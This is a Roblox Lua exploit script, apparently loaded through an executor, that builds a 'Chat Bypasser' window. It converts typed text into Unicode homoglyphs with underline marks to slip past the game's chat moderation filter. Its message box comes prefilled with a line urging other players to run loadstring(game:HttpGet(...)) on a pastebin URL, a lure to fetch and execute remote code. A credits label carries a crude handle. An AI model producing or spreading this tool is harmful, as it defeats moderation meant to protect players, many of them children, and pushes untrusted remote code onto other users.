local gui = Instance.new("ScreenGui")
gui.Name = "Chat Bypasser"
gui.Parent = game.CoreGui

local main = Instance.new("Frame")
main.Size = UDim2.new(0.2, 0, 0.05, 0)
main.Position = UDim2.new(0.2, 0, 0.2, 0)
main.BackgroundColor3 = Color3.new(0, 0, 0.5)
main.BorderSizePixel = 0
main.Active = true
main.BackgroundTransparency = 0
main.Draggable = true
main.Parent = gui

local lbl = Instance.new("TextLabel")
lbl.Size = UDim2.new(0.62, 0, 1, 0)
lbl.Position = UDim2.new(0, 0, 0, 0)
lbl.BackgroundColor3 = Color3.new(0, 0, 0)
lbl.BorderSizePixel = 0
lbl.Text = "NPatch Bypass 2.2.1"
lbl.TextColor3 = Color3.new(255, 255, 255)
lbl.BackgroundTransparency = 1
lbl.Font = Enum.Font.ArialBold
lbl.TextSize = 15
lbl.Parent = main

local mi = Instance.new("TextButton")
mi.Size = UDim2.new(0.1, 0, 0.8, 0)
mi.Position = UDim2.new(0.89, 0, 0.1, 0)
mi.BackgroundColor3 = Color3.new(0, 0.3, 0.6)
mi.BorderSizePixel = 0
mi.Text = ">"
mi.TextColor3 = Color3.new(255, 255, 255)
mi.BackgroundTransparency = 0
mi.Font = Enum.Font.Arial
mi.TextSize = 15
mi.Visible = false
mi.Parent = main

local mr = Instance.new("TextButton")
mr.Size = UDim2.new(0.1, 0, 0.8, 0)
mr.Position = UDim2.new(0.89, 0, 0.1, 0)
mr.BackgroundColor3 = Color3.new(0, 0.3,0.6)
mr.BorderSizePixel = 0
mr.Text = "–"
mr.TextColor3 = Color3.new(255, 255, 255)
mr.BackgroundTransparency = 0
mr.Font = Enum.Font.Arial
mr.TextSize = 15
mr.Parent = main

local by = Instance.new("Frame")
by.Size = UDim2.new(1, 0, 5, 0)
by.Position = UDim2.new(0, 0, 1, 0)
by.BackgroundColor3 = Color3.new(0, 0, 0.2)
by.BorderColor3 = Color3.new(0, 0, 0)
by.BorderSizePixel = 0
by.Active = false
by.BackgroundTransparency = 0
by.Parent = main

local cre = Instance.new("TextLabel")
cre.Size = UDim2.new(0.9, 0, 0.1, 0)
cre.Position = UDim2.new(0, 0, 0, 0)
cre.BackgroundColor3 = Color3.new(0, 0, 0)
cre.BorderColor3 = Color3.new(0, 0, 0)
cre.BorderSizePixel = 0
cre.Text = "Created by: Algari_4 / Alga_ri and PlayStationIN"
cre.TextColor3 = Color3.new(255, 255, 255)
cre.BackgroundTransparency = 1
cre.Font = Enum.Font.Arial
cre.TextSize = 10
cre.Parent = by

local yt = Instance.new("TextLabel")
yt.Size = UDim2.new(0.38, 0, 0.1, 0)
yt.Position = UDim2.new(0, 0, 0.1, 0)
yt.BackgroundColor3 = Color3.new(0, 0, 0)
yt.BorderColor3 = Color3.new(0, 0, 0)
yt.BorderSizePixel = 0
yt.Text = "Youtube: @PUSSY"
yt.TextColor3 = Color3.new(255, 255, 255)
yt.BackgroundTransparency = 1
yt.Font = Enum.Font.Arial
yt.TextSize = 10
yt.Parent = by

local box = Instance.new("TextBox")
box.Size = UDim2.new(0.9, 0, 0.3, 0)
box.Position = UDim2.new(0.05, 0, 0.25, 0)
box.BackgroundColor3 = Color3.new(0, 0, 1)
box.BorderSizePixel = 0
box.Text = "pls execute this: loadstring(game:HttpGet('https://pastebin.com/raw/qfmByDZ3'))()"
box.TextColor3 = Color3.new(1,1,1)
box.BackgroundTransparency = 0.8
box.Font = Enum.Font.SourceSans
box.TextSize = 15
box.PlaceholderText = "Enter Text..."
box.TextWrapped = true
box.ClearTextOnFocus = false
box.MultiLine = true
box.TextYAlignment = Enum.TextYAlignment.Top
box.TextXAlignment = Enum.TextXAlignment.Left
box.Parent = by

local send = Instance.new("TextButton")
send.Size = UDim2.new(0.9, 0, 0.2, 0)
send.Position = UDim2.new(0.05, 0, 0.6, 0)
send.BackgroundColor3 = Color3.new(0, 0.3, 0.6)
send.BorderSizePixel = 0
send.Text = "Send Text"
send.TextColor3 = Color3.new(255, 255, 255)
send.BackgroundTransparency = 0
send.Font = Enum.Font.Arial
send.TextSize = 15
send.Parent = by

mi.MouseButton1Click:connect(function()
    mi.Visible = false
    mr.Visible = true
    by.Visible = true
    end)

mr.MouseButton1Click:connect(function()
    mi.Visible = true
    mr.Visible = false
    by.Visible = false
    end)


local function convertText()
local text = box.Text
local convertedText = ""

local conversionTableUpper = {
    A = "Ạ", B = "Ḅ", C = "С", D = "Ḍ", E = "Ẹ",
    F = "F", G = "Ģ", H = "Ḥ", I = "Ị", J = "J",
    K = "Ḳ", L = "Ḷ", M = "Ṃ", N = "Ṇ", O = "Ọ",
    P = "Р", Q = "Q", R = "Ṛ", S = "Ṣ", T = "Ṭ",
    U = "Ụ", V = "Ṿ", W = "Ẉ", X = "Х", Y = "Ỵ", Z = "Ẓ"
}

local conversionTableLower = {
    a = "ạ", b = "ḅ", c = "с", d = "ḍ", e = "ẹ",
    f = "f", g = "ɡ", h = "ḥ", i = "ị", j = "ј",
    k = "ḳ", l = "ḷ", m = "ṃ", n = "ṇ", o = "ọ",
    p = "р", q = "q", r = "ṛ", s = "ṣ", t = "ṭ",
    u = "ụ", v = "ṿ", w = "ẉ", x = "х", y = "ỵ", z = "ẓ"
}

for char in text:gmatch(".") do
local convertedChar = conversionTableUpper[char] or conversionTableLower[char] or char
convertedText = convertedText .. convertedChar .. "̲"
end

box.Text = convertedText
end

send.MouseButton1Click:connect(function()
    local TextChatService = game:GetService("TextChatService")
    local Players = game:GetService("Players")

    local function sendMessage(msg)
    local player = Players.LocalPlayer
    if TextChatService.ChatInputBarConfiguration.TargetTextChannel then
    TextChatService.ChatInputBarConfiguration.TargetTextChannel:SendAsync(msg)
    else
        game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(msg, "All")
    end
    end
    convertText()
    sendMessage(box.Text)
    box.Text = ""
    end)

local conv = Instance.new("TextButton")
conv.Size = UDim2.new(0.9, 0, 0.1, 0)
conv.Position = UDim2.new(0.05, 0, 0.85, 0)
conv.BackgroundColor3 = Color3.new(0, 0.3, 0.6)
conv.BorderColor3 = Color3.new(0, 0, 0)
conv.BorderSizePixel = 0
conv.Text = "Convert"
conv.TextColor3 = Color3.new(255, 255, 255)
conv.BackgroundTransparency = 0
conv.Font = Enum.Font.Arial
conv.TextSize = 15
conv.Parent = by

conv.MouseButton1Click:connect(function()
convertText()
end)
